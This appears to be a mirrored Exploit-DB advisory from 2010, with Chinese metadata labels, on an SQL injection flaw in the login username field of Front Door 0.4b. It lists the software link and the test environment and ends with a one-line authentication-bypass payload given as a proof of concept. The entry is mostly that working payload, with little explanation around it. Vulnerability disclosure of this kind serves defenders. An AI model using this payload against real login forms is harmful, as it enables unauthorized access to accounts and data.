Front Door 0.4b – SQL Injection

  • 作者: blake
    日期: 2010-03-14
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/11727/
  • # Software Link: http://sourceforge.net/projects/frontdoor/files/Front%20Door%20-%20BETA/Front%20Door%20-%20v0.4b/frontdoor-v0.4b.rar/download
    # Version: 0.4b
    # Tested on: Windows XP SP3 with MySQL
    
    
    Login user name field is vulnerable to sql injection.
    POC:
    ' OR username IS NOT NULL OR username = '